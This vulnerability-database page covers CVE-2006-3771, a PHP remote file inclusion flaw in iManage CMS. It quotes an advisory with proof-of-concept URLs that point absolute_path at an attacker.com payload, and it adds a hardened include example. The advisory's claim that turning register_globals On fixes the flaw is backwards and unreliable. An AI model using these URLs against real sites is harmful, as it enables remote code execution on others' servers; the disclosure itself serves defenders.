CVE-2006-3771
CVSS 7.5
Published: 2006-07-24 08:19:00
Revised: 2008-09-10 16:24:44

[Original] Multiple PHP remote file inclusion vulnerabilities in component.php in iManage CMS 4.0.12 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the absolute_path parameter to (1) articles.php, (2) contact.php, (3) displaypage.php, (4) faq.php, (5) mainbody.php, (6) news.php, (7) registration.php, (8) whosOnline.php, (9) components/com_calendar.php, (10) components/com_forum.php, (11) components/minibb/index.php, (12) components/minibb/bb_admin.php, (13) components/minibb/bb_plugins.php, (14) modules/mod_calendar.php, (15) modules/mod_browser_prefs.php, (16) modules/mod_counter.php, (17) modules/mod_online.php, (18) modules/mod_stats.php, (19) modules/mod_weather.php, (20) themes/bizz.php, (21) themes/default.php, (22) themes/simple.php, (23) themes/original.php, (24) themes/portal.php, (25) themes/purple.php, and other unspecified files.


[CNNVD] iManage CMS 'component.php' Multiple PHP Remote File Inclusion Vulnerabilities (CNNVD-200607-375)

Multiple PHP remote file inclusion vulnerabilities exist in component.php in iManage CMS 4.0.12 and earlier. Remote attackers can execute arbitrary PHP code via a URL in the absolute_path parameter to (1) articles.php, (2) contact.php, (3) displaypage.php, (4) faq.php, (5) mainbody.php, (6) news.php, (7) registration.php, (8) whosOnline.php, (9) components/com_calendar.php, (10) components/com_forum.php, (11) components/minibb/index.php, (12) components/minibb/bb_admin.php, (13) components/minibb/bb_plugins.php, (14) modules/mod_calendar.php, (15) modules/mod_browser_prefs.php, (16) modules/mod_counter.php, (17) modules/mod_online.php, (18) modules/mod_stats.php, (19) modules/mod_weather.php, (20) themes/bizz.php, (21) themes/default.php, (22) themes/simple.php, (23) themes/original.php, (24) themes/portal.php, (25) themes/purple.php, and other unspecified files.

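- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (Affected Platforms and Products)

Product and version information (CPE) is not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3771
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3771
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-375
(Official data source) CNNVD

- Other Links and Resources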

http://www.securityfocus.com/bid/19090
(UNKNOWN)  BID  19090
http://www.securityfocus.com/archive/1/archive/1/440642/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060720 [ECHO_ADV_40$2006] iManage CMS <= 4.0.12 (absolute_path) Remote File Inclusion
http://advisories.echo.or.id/adv/adv40-matdhule-2006.txt
(UNKNOWN)  MISC  http://advisories.echo.or.id/adv/adv40-matdhule-2006.txt
http://xforce.iss.net/xforce/xfdb/27875
(UNKNOWN)  XF  imanagecms-absolutepath-file-include(27875)
http://www.osvdb.org/28671
(UNKNOWN)  OSVDB  28671
http://www.osvdb.org/28670
(UNKNOWN)  OSVDB  28670
http://www.osvdb.org/28669
(UNKNOWN)  OSVDB  28669
http://www.osvdb.org/28668
(UNKNOWN)  OSVDB  28668
http://www.osvdb.org/28667
(UNKNOWN)  OSVDB  28667
http://www.osvdb.org/28666
(UNKNOWN)  OSVDB  28666
http://www.osvdb.org/28665
(UNKNOWN)  OSVDB  28665
http://www.osvdb.org/28664
(UNKNOWN)  OSVDB  28664
http://www.osvdb.org/28663
(UNKNOWN)  OSVDB  28663
http://www.osvdb.org/28662
(UNKNOWN)  OSVDB  28662
http://www.osvdb.org/28661
(UNKNOWN)  OSVDB  28661
http://www.osvdb.org/28660
(UNKNOWN)  OSVDB  28660
http://www.osvdb.org/28659
(UNKNOWN)  OSVDB  28659
http://www.osvdb.org/28658
(UNKNOWN)  OSVDB  28658
http://www.osvdb.org/28657
(UNKNOWN)  OSVDB  28657
http://www.osvdb.org/28656
(UNKNOWN)  OSVDB  28656
http://www.osvdb.org/28655
(UNKNOWN)  OSVDB  28655
http://www.osvdb.org/28654
(UNKNOWN)  OSVDB  28654
http://www.osvdb.org/28653
(UNKNOWN)  OSVDB  28653
http://www.osvdb.org/28652
(UNKNOWN)  OSVDB  28652
http://www.osvdb.org/28651
(UNKNOWN)  OSVDB  28651
http://www.osvdb.org/28650
(UNKNOWN)  OSVDB  28650
http://www.osvdb.org/28649
(UNKNOWN)  OSVDB  28649
http://www.osvdb.org/28648
(UNKNOWN)  OSVDB  28648
http://www.osvdb.org/28647
(UNKNOWN)  OSVDB  28647
http://securitytracker.com/id?1016551
(UNKNOWN)  SECTRACK  1016551
http://securityreason.com/securityalert/1265
(UNKNOWN)  SREASON  1265
http://milw0rm.com/exploits/2046
(UNKNOWN)  MILW0RM  2046

- Vulnerability Information

iManage CMS 'component.php' Multiple PHP Remote File Inclusion Vulnerabilities
High risk  Input validation
2006-07-24 00:00:00 2006-08-07 00:00:00
Remote

- Advisories and Patches

        No data available

- Vulnerability Information (2046)

iManage CMS <= 4.0.12 (absolute_path) Remote File Inclusion (EDBID:2046)
php webapps
2006-07-20 Verified
0 Matdhule
N/A
____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \
 |    __)_ /    \  \//    ~    \/   |   \
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/                              .OR.ID
ECHO_ADV_40$2006

---------------------------------------------------------------------------------------------------
[ECHO_ADV_40$2006] iManage CMS <= 4.0.12 (absolute_path) Remote File Inclusion
---------------------------------------------------------------------------------------------------

Author          : Ahmad Maulana a.k.a Matdhule
Date Found      : July, 20th 2006
Location        : Indonesia, Jakarta
web             : http://advisories.echo.or.id/adv/adv40-matdhule-2006.txt
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
iManage CMS from Imaginex-Resource

Application     : iManage CMS
version         : 4.0.12 stable
URL             : http://www.imaginex-resource.com

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~

-----------------------component.php----------------------
....
<?php
/**
*    iManage Version 4.0.12
*    Dynamic portal server and Content managment engine
*    03-02-2003
*
*    Copyright (C) 2000 - 2003 Imaginex-Resource
*
*    Site Name: iManage Version 4.0.12
*    File Name: rightComponent.php
*    Date: 31/01/2003
*     Version #: 4.0.12
*    Comments: Display all modules which are to be displayed on the right.
**/

include($absolute_path.'/language/'.$lang.'/lang_components.php');
...
----------------------------------------------------------

Input passed to the "absolute_path" parameter in component.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources

Affected files: 

articles.php
contact.php
displaypage.php
faq.php
mainbody.php
news.php
registration.php
whosOnline.php
components/com_calendar.php
components/com_forum.php
components/minibb/index.php
components/minibb/bb_admin.php
components/minibb/bb_plugins.php
modules/mod_calendar.php
modules/mod_browser_prefs.php
modules/mod_counter.php
modules/mod_online.php
modules/mod_stats.php
modules/mod_weather.php
themes/bizz.php
themes/default.php
themes/simple.php
themes/original.php
themes/portal.php
themes/purple.php

and more :)

Successful exploitation requires that "register_globals= Off ".

Proof Of Concept:
~~~~~~~~~~~~~

http://target.com/[path]/articles.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/contact.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/displaypage.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/faq.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/mainbody.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/news.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/registration.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/whosOnline.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/components/com_calendar.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/components/com_forum.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/components/minibb/index.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/modules/mod_calendar.php?absolute_path=http://attacker.com//inject.txt?

and more Affected files


Solution:
~~~~~
- Change register_globals= On 
  in php.ini
- Sanitize variable $absolute_path on affected files.

---------------------------------------------------------------------------
Shoutz:
~
~ solpot a.k.a chris, J4mbi  H4ck3r for the hacking lesson  :) 
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com
~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~
 
     matdhule[at]gmail[dot]com
     
-------------------------------- [ EOF ]----------------------------------

# milw0rm.com [2006-07-20]
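
A hardened form of the include() quoted in the advisory, as an added example that is not iManage code and not part of the original advisory. $absolute_path is settable from the query string when PHP's register_globals is enabled; the sketch removes that dependency and validates the other path component. IMANAGE_ROOT, IMANAGE_ENTRY, lang_file(), the 'lang' request parameter and the 'english' fallback are assumptions; PHP 7.1 or later is assumed.

```php
<?php
// Added example, not iManage code. IMANAGE_ROOT, IMANAGE_ENTRY and
// lang_file() are hypothetical names. Requires PHP 7.1+.

// 1. The base path comes from the file system, never from the request.
//    A constant cannot be overwritten by request variables.
define('IMANAGE_ROOT', realpath(__DIR__));

// 2. Files meant only to be included refuse direct requests. The entry
//    script would run define('IMANAGE_ENTRY', true) first, and every
//    component, module and theme file would begin with:
//        defined('IMANAGE_ENTRY') or exit('Direct access denied');

/**
 * Resolve language/<lang>/<file> under $root. Returns the canonical path,
 * or null when $lang is malformed or the file is outside language/.
 */
function lang_file(string $root, string $lang, string $file): ?string
{
    // Language names are short identifiers: no slashes, dots or schemes.
    if (!preg_match('/\A[A-Za-z][A-Za-z0-9_-]{1,31}\z/', $lang)) {
        return null;
    }
    $base = realpath($root . '/language');
    // realpath() returns false for anything missing on the local disk.
    $path = realpath($root . '/language/' . $lang . '/' . basename($file));
    if ($base === false || $path === false) {
        return null;
    }
    // Containment check after symlinks and ".." have been resolved.
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// 3. Replacement for the include() shown in the advisory. Taking $lang from
//    the query string and 'english' as the fallback are assumptions.
$lang = (isset($_GET['lang']) && is_string($_GET['lang'])) ? $_GET['lang'] : 'english';
$path = lang_file(IMANAGE_ROOT, $lang, 'lang_components.php')
     ?? lang_file(IMANAGE_ROOT, 'english', 'lang_components.php');
if ($path === null) {
    http_response_code(500);
    exit('Language file not found');
}
include $path;
```

At the server level, allow_url_include = Off (the default since PHP 5.2) stops include() from fetching URLs, and register_globals no longer exists as of PHP 5.4.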
		

- Vulnerability Information

28647
iManage CMS themes/default.php absolute_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability Description

iManage CMS contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the themes/default.php script not properly sanitizing user input supplied to the 'absolute_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- Timeline

2006-07-20 Unknown
2006-07-20 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
